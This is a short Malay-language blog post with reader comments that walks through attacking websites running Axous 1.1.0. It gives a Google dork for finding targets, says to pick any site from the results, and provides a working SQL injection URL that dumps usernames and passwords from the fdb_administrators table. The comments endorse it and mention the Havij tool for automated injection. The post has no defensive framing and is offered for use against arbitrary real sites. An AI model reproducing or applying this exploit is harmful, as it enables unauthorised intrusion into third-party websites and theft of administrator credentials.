1. Guna google dork ni :
intext:"Powered by Axous 1.1.0"
2. Pilih salah satu website dari result.
3. Exploit :
http://[target]/page.php?id=[SQLi Di Sini]
Contoh :
http://[target]/page.php?id=-1+union+select+1,group_concat(id,0x3a,username
,0x3a,password),3+from+fdb_administrators--
Baiklah semoga berjaya Assalamualaikum~
nice share br0 ^^
ReplyDeletedork cam nie ke intext:"Powered by Axous 1.1.0"
ReplyDeleteaq x faham?mne nk dpt sqli?
ReplyDeletesuperfarrace: ya cam tu
ReplyDeleteinformasi la : sqli tu kau kena inject la.manual sql injection atau pun guna havij :D